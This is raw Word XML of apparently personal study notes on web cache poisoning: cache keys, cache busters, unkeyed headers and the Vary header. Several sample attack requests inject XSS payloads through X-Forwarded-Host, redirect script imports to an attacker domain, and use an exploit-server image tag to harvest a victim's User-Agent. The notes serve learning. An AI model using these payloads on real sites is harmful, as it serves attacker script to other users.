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300" w14:textId="77777777" w:rsidR="00A12C6F" w:rsidRPr="00C825E5" w:rsidRDefault="00A12C6F" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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>Notes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9C7394" w14:textId="77777777" w:rsidR="00A12C6F" w:rsidRPr="00C825E5" w:rsidRDefault="00A12C6F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- Pay attention to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\r\n\r\n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at the end of the request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060AC0AC" w14:textId="77777777" w:rsidR="00A12C6F" w:rsidRPr="00C825E5" w:rsidRDefault="00A12C6F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- Responses containing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Set-Cookie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headers are not cacheable on the site. Reload the site to generate a new request, which should have a session cookie already set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF8D23A" w14:textId="6D5DF0BB" w:rsidR="00A12C6F" w:rsidRPr="00C825E5" w:rsidRDefault="00A12C6F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- Set the filter in Target to see the JSON files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47E9238E" w14:textId="465ECDFB" w:rsidR="0050339F" w:rsidRPr="00C825E5" w:rsidRDefault="0050339F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-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If loading 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json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from the exploiting server, add the header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Access-Control-Allow-Origin: *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to enable CORS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16BEC9" w14:textId="0BCD4C67" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00324136" w:rsidP="00C825E5">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="1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What is web cache poisoning?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390E2672" w14:textId="2D231908" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00324136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Attaker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makes a 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harmfull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HTTP response cached und served to a victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5594D1" w14:textId="1B034F15" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00324136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noProof/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68FD964B" wp14:editId="7904F7EC">
            <wp:extent cx="6645910" cy="1796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F105" w14:textId="2E6F45AE" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00324136" w:rsidP="00C825E5">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3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Cache key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B7C10F" w14:textId="3AB8DAD0" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00EB43F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Cache key is a</w:t>
      </w:r>
      <w:r w:rsidR="00324136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subset of the request’s components, normally request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324136" w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>line and Host header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3F1D79" w14:textId="752B6B46" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00324136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Requests with the same cache key are considered equivalent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E71A5B5" w14:textId="60AF31A1" w:rsidR="00EB43FC" w:rsidRPr="00C825E5" w:rsidRDefault="00EB43F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Try adding random input, it is keyed if:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EEDDED" w14:textId="77777777" w:rsidR="00EB43FC" w:rsidRPr="00C825E5" w:rsidRDefault="00EB43F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- inputs are reflected in response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBF4974" w14:textId="4EBCCDCA" w:rsidR="00EB43FC" w:rsidRPr="00C825E5" w:rsidRDefault="00EB43F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- entirely different responses </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2F9526" w14:textId="0AC1FC59" w:rsidR="004A48DA" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA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4DC9E466" w14:textId="77777777" w:rsidR="004A48DA" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA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Add </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">cache-buster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to request line: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>e.g. ?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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abc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/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=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554C061A" w14:textId="77777777" w:rsidR="004A48DA" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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Accept-Encoding: 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gzip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, deflate, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cachebuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6093069C" w14:textId="77777777" w:rsidR="004A48DA" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA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Accept: */*, text/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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cachebuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03716F7C" w14:textId="77777777" w:rsidR="004A48DA" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA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Cookie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cachebuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1437B91D" w14:textId="0712D4B7" w:rsidR="00CA6E9C" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/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Origin: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C825E5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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>https://</w:t>
        </w:r>
        <w:r w:rsidRPr="00C825E5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>cachebuster</w:t>
        </w:r>
        <w:r w:rsidRPr="00C825E5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  <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>.vulnerable-website.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2816A560" w14:textId="72BFB872" w:rsidR="00876B18" w:rsidRPr="00C825E5" w:rsidRDefault="00876B18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 xml:space="preserve">Use param Miner </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to automatically add cache-buster</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. Turn off when delivering attack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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B528FF" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788" w:rsidP="00C825E5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="150"/>
        <w:jc w:val="both"/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</w:pPr>
    </w:p>
    <w:p w14:paraId="7ECC622F" w14:textId="0603392D" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788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Identify a suitable cache oracle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01DFA4E8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-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X-Cache, Age, Cache-Control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headers in Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77116AE8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- changes to dynamic content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723F47D4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- distinct response time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B39278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0406C237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Akamai-based websites may support the header </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pragma: (akamai-)x-get-cache-key</w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">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to display the cache key in the response headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12556970" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C9578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71BAA829" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788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 /?param=1 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D22FDA" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788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innocent-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A828D18" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788" w:rsidP="00C825E5">
      <w:pPr>
        <w:jc w:val="both"/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Pragma: akamai-x-get-cache-key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6BB5D3" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788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82B2CE7" w14:textId="77777777" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49453343" w14:textId="43BCC2FB" w:rsidR="00C95788" w:rsidRPr="00C825E5" w:rsidRDefault="00C95788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X-Cache-Key: innocent-website.com/?param=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B90F884" w14:textId="439AB7EB" w:rsidR="00B51A32" w:rsidRPr="00C825E5" w:rsidRDefault="00B51A32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218E95A7" w14:textId="2FFF1AFD" w:rsidR="00B51A32" w:rsidRPr="00C825E5" w:rsidRDefault="00B51A32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Don't let the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="001350"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'Cache Control: no-cache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' header dissuade you – it's always better to attempt an attack than assume it won't work. You can verify first by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sending the request wit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h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the malicious header, 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then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resending the request without the malicious header, and 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finally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fetching the URL directly in a browser on a different machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A5D57" w14:textId="7A3E7616" w:rsidR="00EB43FC" w:rsidRPr="00C825E5" w:rsidRDefault="00EB43FC" w:rsidP="00C825E5">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="150"/>
        <w:jc w:val="both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Identify and evaluate unkeyed inputs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC88BEB" w14:textId="542DCA4B" w:rsidR="00EB43FC" w:rsidRPr="00C825E5" w:rsidRDefault="00EB43F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Malicous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payloads are put in unkeyed components: normally headers</w:t>
      </w:r>
      <w:r w:rsidR="00C47079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(</w:t>
      </w:r>
      <w:r w:rsidR="00C47079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X-Forwarded-Host</w:t>
      </w:r>
      <w:r w:rsidR="00786EDC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, X-Forwarded-Scheme</w:t>
      </w:r>
      <w:r w:rsidR="008A7EF3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, X-Forwarded-Proto, X-Host</w:t>
      </w:r>
      <w:r w:rsidR="0061333D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, X-Original-URL, X-Rewrite-URL</w:t>
      </w:r>
      <w:r w:rsidR="00C47079" w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="007D7220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and</w:t>
      </w:r>
      <w:r w:rsidR="00F76FA6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cookies</w:t>
      </w:r>
      <w:r w:rsidR="008A7EF3" w:rsidRPr="00C825E5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37F5C606" w14:textId="30E9F6D4" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="004A48DA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Use </w:t>
      </w:r>
      <w:r w:rsidR="00EB43FC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Param Miner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to find unkeyed headers:</w:t>
      </w:r>
      <w:r w:rsidR="00EB43FC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“</w:t>
      </w:r>
      <w:r w:rsidR="00EB43FC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Guess </w:t>
      </w:r>
      <w:r w:rsidR="0065348F" w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>everything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”</w:t>
      </w:r>
      <w:r w:rsidR="0065348F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. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C4893F" w14:textId="5C64D965" w:rsidR="00324136" w:rsidRPr="00C825E5" w:rsidRDefault="00324136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0E6E3D88" w14:textId="77777777" w:rsidR="00D032F3" w:rsidRPr="00C825E5" w:rsidRDefault="00D032F3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0" w:name="_Hlk117784896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Using web cache poisoning to deliver an </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C825E5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="FF6633"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>XSS</w:t>
        </w:r>
      </w:hyperlink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 attack</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="1684ECDD" w14:textId="355D1072" w:rsidR="00A52DDD" w:rsidRPr="00C825E5" w:rsidRDefault="00C47079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Consider:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2881D23B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en?region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uk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HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="176AEA57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innocent-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BACDB53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lastRenderedPageBreak/>
        <w:t>X-Forwarded-Host: innocent-website.co.uk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3167098C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58E60637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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B895B54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Cache-Control: public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4CC7B8" w14:textId="2F8155D9" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C4707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&lt;meta property="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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og:image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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" content="https://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innocent-website.co.uk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cms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/social.png" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4574DD3B" w14:textId="77777777" w:rsidR="00FD6A2B" w:rsidRPr="00C825E5" w:rsidRDefault="00FD6A2B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5EFDAC05" w14:textId="02C4C0CC" w:rsidR="00FD6A2B" w:rsidRPr="00C825E5" w:rsidRDefault="00C47079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Attack:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3128FE24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en?region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uk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HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAA78DB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innocent-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EB31DE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X-Forwarded-Host: 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a."&gt;&lt;script&gt;alert(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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1)&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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/script&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E4CFFE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4C0BFB8C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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BE0427" w14:textId="77777777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Cache-Control: public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5125140C" w14:textId="2763215F" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C4707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&lt;meta property="</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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og:image</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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" content="https://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a."&gt;&lt;script&gt;alert(1)&lt;/script&gt;"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cms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/social.png" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2103EFE9" w14:textId="77777777" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C4707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59390022" w14:textId="1A7D67D1" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C4707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If this response gets cached, all users who visit /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en?region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>=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uk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will be served the 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malicous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payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58046D1B" w14:textId="6789707B" w:rsidR="00CA6E9C" w:rsidRPr="00C825E5" w:rsidRDefault="00CA6E9C" w:rsidP="00C825E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Check if the input is reflected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A79839" w14:textId="77777777" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C4707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705E2DAE" w14:textId="1FFD7332" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C47079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1" w:name="_Hlk117784903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Using web cache poisoning to exploit unsafe handling of resource imports</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p w14:paraId="38D0D9D2" w14:textId="4206FC8A" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00C47079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Some websites use unkeyed headers to dynamically generate URLs for importing resources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  <w:r w:rsidR="004755C5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If </w:t>
      </w:r>
      <w:r w:rsidR="004755C5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they are used for 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loading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JavaScript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</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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,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w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e can make them point to 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Javascripts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on our malicious domain</w:t>
      </w:r>
      <w:r w:rsidR="00CA6E9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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A02C04" w14:textId="77777777" w:rsidR="004755C5" w:rsidRPr="00C825E5" w:rsidRDefault="004755C5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0561A46C" w14:textId="30973384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 HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DED7178" w14:textId="77777777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innocent-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6926BED7" w14:textId="77777777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X-Forwarded-Host: evil-user.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E742B6E" w14:textId="77777777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User-Agent: Mozilla/5.0 Firefox/57.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B2CEF7" w14:textId="77777777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7BBA8F73" w14:textId="77777777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HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E131098" w14:textId="02D238B2" w:rsidR="00CA6E9C" w:rsidRPr="00C825E5" w:rsidRDefault="00CA6E9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&lt;script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src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="https://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evil-user.net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/static/analytics.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55D5B5E4" w14:textId="77777777" w:rsidR="00CA6E9C" w:rsidRPr="00C825E5" w:rsidRDefault="00CA6E9C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408FB9C8" w14:textId="2593BD9A" w:rsidR="00C47079" w:rsidRPr="00C825E5" w:rsidRDefault="00CA6E9C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loading Images, we can execute direct XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDD70A6" w14:textId="77777777" w:rsidR="00F76FA6" w:rsidRPr="00C825E5" w:rsidRDefault="00F76FA6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5630BAA7" w14:textId="4C9FEF3E" w:rsidR="00F76FA6" w:rsidRPr="00C825E5" w:rsidRDefault="00F76FA6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2" w:name="_Hlk117786363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Using web cache poisoning to exploit cookie-handling vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="0050227D"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 xml:space="preserve"> (x)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="163B6A27" w14:textId="0E1B16EB" w:rsidR="00F80379" w:rsidRPr="00C825E5" w:rsidRDefault="0065348F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Cookies are normally not cached. Check if their values are reflected. If yes, deliver XSS</w:t>
      </w:r>
      <w:r w:rsidR="00A12C6F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</w:p>
    <w:p w14:paraId="09F67C17" w14:textId="77777777" w:rsidR="0065348F" w:rsidRPr="00C825E5" w:rsidRDefault="0065348F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77A89505" w14:textId="77777777" w:rsidR="0065348F" w:rsidRPr="00C825E5" w:rsidRDefault="0065348F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3" w:name="_Hlk117791742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Using multiple headers to exploit web cache poisoning vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p w14:paraId="6599DCE5" w14:textId="2EA9FFD5" w:rsidR="0065348F" w:rsidRPr="00C825E5" w:rsidRDefault="0065348F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Consider a website requir</w:t>
      </w:r>
      <w:r w:rsidR="00786ED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ing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secure communication using HTTPS.</w:t>
      </w:r>
      <w:r w:rsidR="00786ED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I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f a request </w:t>
      </w:r>
      <w:r w:rsidR="00786ED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uses HTTP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, the website</w:t>
      </w:r>
      <w:r w:rsidR="00786EDC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generates a redirect to HTTPS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC84DD8" w14:textId="77777777" w:rsidR="0050227D" w:rsidRPr="00C825E5" w:rsidRDefault="0050227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4B7740AA" w14:textId="77777777" w:rsidR="00786EDC" w:rsidRPr="00C825E5" w:rsidRDefault="00786ED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/random HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F8AA13" w14:textId="77777777" w:rsidR="00786EDC" w:rsidRPr="00C825E5" w:rsidRDefault="00786ED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innocent-site.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A17F75" w14:textId="77777777" w:rsidR="00786EDC" w:rsidRPr="00C825E5" w:rsidRDefault="00786EDC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X-Forwarded-Proto: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CA37C33" w14:textId="77777777" w:rsidR="00786EDC" w:rsidRPr="00C825E5" w:rsidRDefault="00786ED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56E0A26B" w14:textId="77777777" w:rsidR="00786EDC" w:rsidRPr="00C825E5" w:rsidRDefault="00786ED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HTTP/1.1 301 moved permanently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7E6C0C" w14:textId="4A81625C" w:rsidR="0065348F" w:rsidRPr="00C825E5" w:rsidRDefault="00786EDC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Location: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="00F63B54" w:rsidRPr="00C825E5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:b/>
            <w:bCs/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US" w:eastAsia="de-DE"/>
          </w:rPr>
          <w:t>https</w:t>
        </w:r>
        <w:r w:rsidR="00F63B54" w:rsidRPr="00C825E5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US" w:eastAsia="de-DE"/>
          </w:rPr>
          <w:t>://innocent-site.com/random</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="456A7FBC" w14:textId="110FBB39" w:rsidR="00F63B54" w:rsidRPr="00C825E5" w:rsidRDefault="00F63B54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6EAECBC8" w14:textId="02F57A4C" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF3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Pay attention to the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loaded resources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(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Javascripts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>), those can also be cached.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5791D7C6" w14:textId="77777777" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF3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590C4F9B" w14:textId="77777777" w:rsidR="00F63B54" w:rsidRPr="00C825E5" w:rsidRDefault="00F63B54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4" w:name="_Hlk117794403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Vary header</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/>
    <w:p w14:paraId="570B2356" w14:textId="00F2E4FE" w:rsidR="0065348F" w:rsidRPr="00C825E5" w:rsidRDefault="00F63B54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The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Vary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header specifies a list of additional headers that should be treated as part of the cache key even if they are normally unkeyed.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For example: if we specify that the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User-Agent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header should be keyed, we can target a specific subset of users, not all.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0E44FA" w14:textId="77777777" w:rsidR="00483E3E" w:rsidRPr="00C825E5" w:rsidRDefault="00483E3E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57892A19" w14:textId="77777777" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF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Find User-Agent of victim using XSS: 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&lt;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img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src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>="https://exploit-server.net/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abc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>" /&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D175C7" w14:textId="4420EB08" w:rsidR="00F80379" w:rsidRPr="00C825E5" w:rsidRDefault="00F80379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623DD4E9" w14:textId="77777777" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF3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5" w:name="_Hlk117796458"/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Using web cache poisoning to exploit DOM-based vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="04F30DC8" w14:textId="77777777" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF3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We could poison the cache with a response that imports a JSON file containing the following payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE5659A" w14:textId="07027945" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF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{"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someProperty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gram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" :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 "&lt;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svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 onload=alert(1)&gt;"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B753DCF" w14:textId="3E7BDA9E" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF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the website then passes the value of this property into a sink, the payload would be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D62260" w14:textId="2FF18A94" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF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1323206C" w14:textId="77777777" w:rsidR="008A7EF3" w:rsidRPr="00C825E5" w:rsidRDefault="008A7EF3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If loading </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C825E5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>json</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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from the exploiting server, add the header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Access-Control-Allow-Origin: *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to enable CORS</w:t>
      </w:r>
    </w:p>
